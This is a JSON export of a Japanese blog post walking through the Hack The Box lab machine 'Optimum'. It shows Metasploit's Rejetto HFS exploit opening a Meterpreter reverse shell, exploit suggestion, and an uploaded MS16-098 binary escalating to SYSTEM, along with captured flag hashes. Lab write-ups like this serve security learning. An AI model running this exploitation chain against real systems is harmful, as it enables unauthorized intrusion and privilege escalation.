{"id":3714,"date":"2020-08-08T14:26:03","date_gmt":"2020-08-08T05:26:03","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3714"},"modified":"2020-08-30T23:34:55","modified_gmt":"2020-08-30T14:34:55","slug":"hack-the-box-optimum-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3714","title":{"rendered":"Hack The Box &#8211; Optimum &#8211; Walkthrough"},"content":{"rendered":"<h3>\u4eca\u56de\u306f\u30dd\u30fc\u30c8\u30922\u3064\u958b\u3051\u305f<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\ndocker run -p 1234:1234 -p 8080:8080 -t -i htb \/bin\/bash\r\n<\/pre>\n<h3>hfs\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308b<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 optimum.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-05 14:29 UTC\r\nNmap scan report for optimum.htb (10.10.10.8)\r\nHost is up (0.042s latency).\r\nNot shown: 99 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n80\/tcp open  http    HttpFileServer httpd 2.3\r\n|_http-server-header: HFS 2.3\r\n|_http-title: HFS \/\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nDevice type: print server|printer\r\nRunning: HP embedded\r\nOS CPE: cpe:\/h:hp:jetdirect_170x cpe:\/h:hp:inkjet_3000\r\nOS details: HP 170X print server or Inkjet 3000 printer, HP LaserJet 4250 printer\r\nNetwork Distance: 2 hops\r\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\r\n<\/pre>\n<h3>msfconsole\u3067hfs\u306e\u8106\u5f31\u6027\u3092\u653b\u3081\u308b<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# msfconsole\r\n\r\n               .;lxO0KXXXK0Oxl:.\r\n           ,o0WMMMMMMMMMMMMMMMMMMKd,\r\n        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,\r\n      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:\r\n    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,\r\n   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo\r\n  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk\r\n oMMMMMMMMMMx.                    dMMMMMMMMMMx\r\n.WMMMMMMMMM:                       :MMMMMMMMMM,\r\nxMMMMMMMMMo                         lMMMMMMMMMO\r\nNMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;\r\nMMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:\r\nNMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:\r\nxMMMMMMMMMd                        ,0MMMMMMMMMMK;\r\n.WMMMMMMMMMc                         'OMMMMMM0,\r\n lMMMMMMMMMMk.                         .kMMO'\r\n  dMMMMMMMMMMWd'                         ..\r\n   cWMMMMMMMMMMMNxc'.                ##########\r\n    .0MMMMMMMMMMMMMMMMWc            #+#    #+#\r\n      ;0MMMMMMMMMMMMMMMo.          +:+\r\n        .dNMMMMMMMMMMMMo          +#++:++#+\r\n           'oOWMMMMMMMMo                +:+\r\n               .,cdkO0K;        :+:    :+:\r\n                                :::::::+:\r\n                      Metasploit\r\n\r\n       =&#x5B; metasploit v5.0.100-dev                         ]\r\n+ -- --=&#x5B; 2046 exploits - 1106 auxiliary - 344 post       ]\r\n+ -- --=&#x5B; 562 payloads - 45 encoders - 10 nops            ]\r\n+ -- --=&#x5B; 7 evasion                                       ]\r\n\r\nMetasploit tip: You can upgrade a shell to a Meterpreter session on many platforms using sessions -u &lt;session_id&gt;\r\n\r\nmsf5 &gt; search hfs\r\n\r\nMatching Modules\r\n================\r\n\r\n   #  Name                                        Disclosure Date  Rank       Check  Description\r\n   -  ----                                        ---------------  ----       -----  -----------\r\n   0  exploit\/multi\/http\/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390\r\n   1  exploit\/windows\/http\/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution\r\n\r\n\r\nInteract with a module by name or index, for example use 1 or use exploit\/windows\/http\/rejetto_hfs_exec\r\n\r\nmsf5 &gt; use 1\r\n&#x5B;*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; show options\r\n\r\nModule options (exploit\/windows\/http\/rejetto_hfs_exec):\r\n\r\n   Name       Current Setting  Required  Description\r\n   ----       ---------------  --------  -----------\r\n   HTTPDELAY  10               no        Seconds to wait before terminating web server\r\n   Proxies                     no        A proxy chain of format type:host:port&#x5B;,type:host:port]&#x5B;...]\r\n   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'\r\n   RPORT      80               yes       The target port (TCP)\r\n   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.\r\n   SRVPORT    8080             yes       The local port to listen on.\r\n   SSL        false            no        Negotiate SSL\/TLS for outgoing connections\r\n   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)\r\n   TARGETURI  \/                yes       The path of the web application\r\n   URIPATH                     no        The URI to use for this exploit (default is random)\r\n   VHOST                       no        HTTP server virtual host\r\n\r\n\r\nPayload options (windows\/meterpreter\/reverse_tcp):\r\n\r\n   Name      Current Setting  Required  Description\r\n   ----      ---------------  --------  -----------\r\n   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)\r\n   LHOST     172.17.0.2       yes       The listen address (an interface may be specified)\r\n   LPORT     4444             yes       The listen port\r\n\r\n\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Automatic\r\n\r\n\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; set RHOSTS optimum.htb\r\nRHOSTS =&gt; optimum.htb\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; set LHOST 10.10.14.6\r\nLHOST =&gt; 10.10.14.14\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; set LPORT 1234\r\nLPORT =&gt; 1234\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; exploit\r\n\r\n&#x5B;-] Handler failed to bind to 10.10.14.14:1234:-  -\r\n&#x5B;*] Started reverse TCP handler on 0.0.0.0:1234\r\n&#x5B;*] Using URL: http:\/\/0.0.0.0:8080\/JaNzZ3CB\r\n&#x5B;*] Local IP: http:\/\/172.17.0.2:8080\/JaNzZ3CB\r\n&#x5B;*] Server started.\r\n&#x5B;*] Sending a malicious request to \/\r\n\/usr\/share\/metasploit-framework\/modules\/exploits\/windows\/http\/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete\r\n\/usr\/share\/metasploit-framework\/modules\/exploits\/windows\/http\/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete\r\n&#x5B;*] Payload request received: \/JaNzZ3CB\r\n&#x5B;*] Sending stage (176195 bytes) to 172.17.0.1\r\n&#x5B;*] Meterpreter session 1 opened (172.17.0.2:1234 -&gt; 172.17.0.1:46836) at 2020-08-05 16:23:53 +0000\r\n&#x5B;*] Server stopped.\r\n&#x5B;!] This exploit may require manual cleanup of '%TEMP%\\ZOcsozkNyOEfb.vbs' on the target\r\n\r\nmeterpreter &gt;\r\n&#x5B;!] Tried to delete %TEMP%\\ZOcsozkNyOEfb.vbs, unknown result\r\ngetuid\r\nServer username: OPTIMUM\\kostas\r\n\r\nmeterpreter &gt; shell\r\nProcess 1324 created.\r\nChannel 2 created.\r\nMicrosoft Windows &#x5B;Version 6.3.9600]\r\n(c) 2013 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\kostas\\Desktop&gt;type user.txt.txt\r\ntype user.txt.txt\r\nd0c39409d7b994a9a1389ebf38ef5f73\r\n<\/pre>\n<h2>Windows-Exploit-Suggester\u3092\u5229\u7528\u3057\u3066\u3001\u8106\u5f31\u6027\u3092\u8abf\u3079\u308b<\/h2>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nmeterpreter &gt; execute -f &quot;cmd.exe \/c systeminfo &gt; systeminfo.txt&quot;\r\nProcess 3604 created.\r\nmeterpreter &gt; download systeminfo.txt\r\n&#x5B;*] Downloading: systeminfo.txt -&gt; systeminfo.txt\r\n&#x5B;*] Downloaded 3.26 KiB of 3.26 KiB (100.0%): systeminfo.txt -&gt; systeminfo.txt\r\n&#x5B;*] download   : systeminfo.txt -&gt; systeminfo.txt\r\nmeterpreter &gt; bg\r\n&#x5B;*] Backgrounding session 1..\r\n\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; git clone https:\/\/github.com\/GDSSecurity\/Windows-Exploit-Suggester.git\r\n&#x5B;*] exec: git clone https:\/\/github.com\/GDSSecurity\/Windows-Exploit-Suggester.git\r\n\r\nCloning into 'Windows-Exploit-Suggester'...\r\nremote: Enumerating objects: 120, done.\r\nremote: Total 120 (delta 0), reused 0 (delta 0), pack-reused 120\r\nReceiving objects: 100% (120\/120), 169.26 KiB | 365.00 KiB\/s, done.\r\nResolving deltas: 100% (72\/72), done.\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; cd Windows-Exploit-Suggester\/\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; python2 windows-exploit-suggester.py --update\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet\r\n&#x5B;*] exec: python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet\r\n\r\n&#x5B;*] initiating winsploit version 3.3...\r\n&#x5B;*] database file detected as xls or xlsx based on extension\r\n&#x5B;-] please install and upgrade the python-xlrd library\r\n\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; apt install python-pip\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; python -m pip install xlrd --upgrade\r\n...\r\nInstalling collected packages: xlrd\r\nSuccessfully installed xlrd-1.2.0\r\n\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; vi systeminfo.txt\r\n\u203b\u4e00\u90e8\u6587\u5b57\u5316\u3051\u3057\u3066\u3044\u3066\u3046\u307e\u304f\u51e6\u7406\u3067\u304d\u306a\u304b\u3063\u305f\u305f\u3081\u3001\u5316\u3051\u305f\u90e8\u5206\u3092\u524a\u9664\u3057\u305f\u203b\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet\r\n&#x5B;*] exec: python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet\r\n\r\n&#x5B;*] initiating winsploit version 3.3...\r\n&#x5B;*] database file detected as xls or xlsx based on extension\r\n&#x5B;*] attempting to read from the systeminfo input file\r\n&#x5B;+] systeminfo input file read successfully (utf-8)\r\n&#x5B;*] querying database file for potential vulnerabilities\r\n&#x5B;*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits\r\n&#x5B;*] there are now 246 remaining vulns\r\n&#x5B;+] &#x5B;E] exploitdb PoC, &#x5B;M] Metasploit module, &#x5B;*] missing bulletin\r\n&#x5B;+] windows version identified as 'Windows 2012 R2 64-bit'\r\n&#x5B;*]\r\n&#x5B;E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important\r\n&#x5B;E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important\r\n&#x5B;M] MS16-075: Security Update for Windows SMB Server (3164038) - Important\r\n&#x5B;E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important\r\n&#x5B;E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical\r\n&#x5B;E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important\r\n&#x5B;M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important\r\n&#x5B;E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important\r\n&#x5B;E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important\r\n&#x5B;E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important\r\n&#x5B;E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical\r\n&#x5B;E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important\r\n&#x5B;E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important\r\n&#x5B;E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical\r\n&#x5B;M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical\r\n&#x5B;E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important\r\n&#x5B;M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important\r\n&#x5B;E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical\r\n&#x5B;E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important\r\n&#x5B;E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical\r\n&#x5B;M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical\r\n&#x5B;M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important\r\n&#x5B;M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical\r\n&#x5B;E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important\r\n&#x5B;M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical\r\n&#x5B;*] done\r\n<\/pre>\n<h3>MS16-098\u3092\u8d77\u70b9\u306b\u3057\u3066\u3001administrator\u6a29\u9650\u3092\u596a\u53d6\u3059\u308b<\/h3>\n<p>\u300cMS16-098 exploit\u300d\u3067\u691c\u7d22\u3057\u3066\u3001exploit\u3092\u898b\u3064\u3051\u308b\u3002<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_135818.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_135818-300x234.png\" alt=\"\" width=\"300\" height=\"234\" class=\"alignnone size-medium wp-image-3715\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_135818-300x234.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_135818-1024x797.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_135818-768x598.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_135818-1536x1196.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_135818.png 1965w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; wget -d https:\/\/github.com\/offensive-security\/exploitdb-bin-sploits\/raw\/master\/bin-sploits\/41020.exe\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; sessions\r\n\r\nActive sessions\r\n===============\r\n\r\n  Id  Name  Type                     Information               Connection\r\n  --  ----  ----                     -----------               ----------\r\n  1         meterpreter x86\/windows  OPTIMUM\\kostas @ OPTIMUM  172.17.0.2:1234 -&gt; 172.17.0.1:48926 (10.10.10.8)\r\n\r\nmsf5 exploit(windows\/http\/rejetto_hfs_exec) &gt; sessions -i 1\r\n&#x5B;*] Starting interaction with 1...\r\n\r\nmeterpreter &gt; upload 41020.exe\r\n&#x5B;*] uploading  : 41020.exe -&gt; 41020.exe\r\n&#x5B;*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): 41020.exe -&gt; 41020.exe\r\n&#x5B;*] uploaded   : 41020.exe -&gt; 41020.exe\r\n\r\nmeterpreter &gt; shell\r\nProcess 1100 created.\r\nChannel 5 created.\r\nMicrosoft Windows &#x5B;Version 6.3.9600]\r\n(c) 2013 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\kostas\\Desktop&gt;41020.exe\r\n41020.exe\r\nMicrosoft Windows &#x5B;Version 6.3.9600]\r\n(c) 2013 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\kostas\\Desktop&gt;whoami\r\nwhoami\r\nnt authority\\system\r\n\r\nC:\\Users\\kostas\\Desktop&gt;type C:\\Users\\Administrator\\Desktop\\root.txt\r\ntype C:\\Users\\Administrator\\Desktop\\root.txt\r\n51ed1b36553c8461f4552c2e92b3eeed\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u4eca\u56de\u306f\u30dd\u30fc\u30c8\u30922\u3064\u958b\u3051\u305f docker run -p 1234:1234 -p 8080:8080 -t -i htb \/bin\/bash hfs\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308b # nmap -A -n -F -T5 opt [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3714"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3714"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3714\/revisions"}],"predecessor-version":[{"id":3790,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3714\/revisions\/3790"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3714"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}